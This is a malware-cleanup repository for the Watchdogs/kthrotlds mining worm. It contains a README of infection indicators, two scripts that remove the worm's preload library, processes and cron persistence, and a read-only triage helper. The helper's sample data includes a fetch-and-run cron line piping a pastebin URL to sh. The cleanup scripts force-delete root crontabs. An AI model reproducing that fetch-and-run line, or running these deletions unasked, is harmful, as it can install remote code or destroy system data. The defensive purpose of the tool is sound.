├── README.md
├── busybox
├── clear.sh
└── clear_kthrotlds.sh

/README.md:
--------------------------------------------------------------------------------
# Cleanup tool usage

This cleanup tool targets the Watchdogs mining worm that broke out on 21 February 2019.

- Main indicators of the Watchdogs mining worm:
  + ps -ef | grep watchdogs # the malicious process watchdogs is present
  + ps -ef | grep ksoftirqds # the malicious process ksoftirqds is present
  + chkconfig | grep watchdogs # the malicious startup entry watchdogs is present
  + ldd \`which ps\` | grep libioset.so # ps, rm and other commands are hijacked by the .so
  + crontab -l | grep pastebin # a malicious cron job that downloads the worm is present

- Steps to clean Watchdogs with clear:
  1. Upload busybox to the /bin/ directory.
  2. Run clear.sh.

-------------------------------

# 2019.3.4: added clear_kthrotlds.sh

Added clear_kthrotlds.sh, a cleanup script for the mining-worm variant of 1 March 2019 in which the Watchdogs process was renamed kthrotlds.

- Main indicators of the kthrotlds variant:
  + the watchdogs process is renamed kthrotlds
  + libioset.so is renamed libcset.so
  + the watchdogs boot startup entry is renamed netdns

- Steps to clean kthrotlds with clear_kthrotlds.sh:
  1. Upload busybox to the /bin/ directory.
  2. Run clear_kthrotlds.sh.

# 2019.6.8 additional note

For trojan variants, we recommend engaging a security vendor (e.g. https://moresec.cn):
- Analyse the behaviour in detail, adapt the script, and eradicate the trojan.
- Where analysis is difficult, reinstall the system, check for the vulnerabilities, patch them, and prevent reinfection.

By 默安科技(MoreSec)
--------------------------------------------------------------------------------

/busybox:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MoreSecLab/DDG_MalWare_Clean_Tool/6ab1fc61e8b9e4259f4d4b493b7e4cd9e570687d/busybox
--------------------------------------------------------------------------------

/clear.sh:
--------------------------------------------------------------------------------
service crond stop

# busybox is used for rm/ps/grep/awk because the system binaries are hijacked
# through /etc/ld.so.preload (libioset.so). The preload file may carry the
# immutable attribute, so it is deleted, the attribute is cleared, and it is
# deleted again.
busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libioset.so
chattr -i /etc/ld.so.preload
busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libioset.so

# Kill the malicious processes
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9

# Remove the dropped binary, the cron persistence and the init script
busybox rm -f /tmp/watchdogs
busybox rm -f /etc/cron.d/tomcat
busybox rm -f /etc/cron.d/root
busybox rm -f /var/spool/cron/root
busybox rm -f /var/spool/cron/crontabs/root
busybox rm -f /etc/rc.d/init.d/watchdogs
busybox rm -f /usr/sbin/watchdogs

ldconfig

# Kill the malicious processes again
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9

# Remove the boot startup entry
chkconfig watchdogs off
chkconfig --del watchdogs

service crond start
echo "Done, Please reboot!"


# 1eaf@moresec
--------------------------------------------------------------------------------

/clear_kthrotlds.sh:
--------------------------------------------------------------------------------
service crond stop

# busybox is used for rm/ps/grep/awk because the system binaries are hijacked
# through /etc/ld.so.preload (libcset.so in this variant). The preload file may
# carry the immutable attribute, so it is deleted, the attribute is cleared,
# and it is deleted again.
busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libcset.so
chattr -i /etc/ld.so.preload
busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libcset.so

# Kill the malicious processes
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9

# Remove the dropped binary, the cron persistence and the init scripts
busybox rm -f /tmp/kthrotlds
busybox rm -f /etc/cron.d/tomcat
busybox rm -f /etc/cron.d/root
busybox rm -f /var/spool/cron/root
busybox rm -f /var/spool/cron/crontabs/root
busybox rm -f /etc/rc.d/init.d/kthrotlds
busybox rm -f /usr/sbin/kthrotlds
busybox rm -f /etc/init.d/netdns


ldconfig

# Kill the malicious processes again
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9

# Remove the boot startup entry (named netdns in this variant)
chkconfig netdns off
chkconfig --del netdns

service crond start
echo "Done, Please reboot!"


# sidie@moresec
--------------------------------------------------------------------------------
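The indicators the README lists (the watchdogs/ksoftirqds/kthrotlds process names, the libioset.so/libcset.so preload library, the watchdogs/netdns startup entry and the pastebin cron job) can be checked read-only before either clear script is run. The triage helper below is an added example and not part of the MoreSec tool; its function names, variable names and sample listings are my own constructions.

```shell
#!/bin/sh
# Added example, not part of the MoreSec tool: read-only triage using the
# Watchdogs / kthrotlds indicators from the README. It kills and deletes
# nothing; it counts indicator hits in captured listings so a host can be
# assessed before clear.sh or clear_kthrotlds.sh is run. Samples are constructed.

WD_PROCS='watchdogs|ksoftirqds|kthrotlds'   # process names of both variants
WD_LIBS='libioset\.so|libcset\.so'          # preload libraries that hide them
WD_SERVICES='watchdogs|netdns'              # chkconfig/init names of both variants

# Each counter reads a listing on stdin and prints the number of matching lines.
# "|| true" keeps grep's no-match exit status from aborting a script under set -e.
count_wd_processes() { grep -v 'grep' | grep -cE "$WD_PROCS" || true; }
count_wd_cron()      { grep -ci 'pastebin' || true; }
count_wd_services()  { grep -cE "$WD_SERVICES" || true; }

# The preload check takes a file path; a missing /etc/ld.so.preload counts as clean.
count_wd_preload() {
    if [ -f "$1" ]; then grep -cE "$WD_LIBS" "$1" || true; else echo 0; fi
}

# Live triage of the current host. Like the clear scripts it uses busybox for
# ps, because the system ps may be hijacked by the preloaded library.
triage_host() {
    echo "processes: $(busybox ps | count_wd_processes)"
    echo "crontab:   $(crontab -l 2>/dev/null | count_wd_cron)"
    echo "services:  $(chkconfig 2>/dev/null | count_wd_services)"
    echo "preload:   $(count_wd_preload /etc/ld.so.preload)"
}

# Constructed listings resembling an infected host (PLACEHOLDER is not a real paste id).
SAMPLE_PS='PID USER VSZ STAT COMMAND
    1 root  4368 S    /sbin/init
 2310 root 18764 S    /usr/sbin/watchdogs
 2311 root 11536 S    ksoftirqds
 2400 root  3288 S    grep watchdogs'
SAMPLE_CRON='*/1 * * * * curl -fsSL https://pastebin.com/raw/PLACEHOLDER | sh'
SAMPLE_CHKCONFIG='crond   0:off 1:off 2:on 3:on 4:on 5:on 6:off
netdns  0:off 1:off 2:on 3:on 4:on 5:on 6:off'

# Run with --live to triage the current host instead of the samples.
if [ "${1:-}" = "--live" ]; then triage_host; fi
```

A non-zero count in any category means the host matches the corresponding README indicator and the matching clear script (or, for variants, a vendor-led analysis) is warranted.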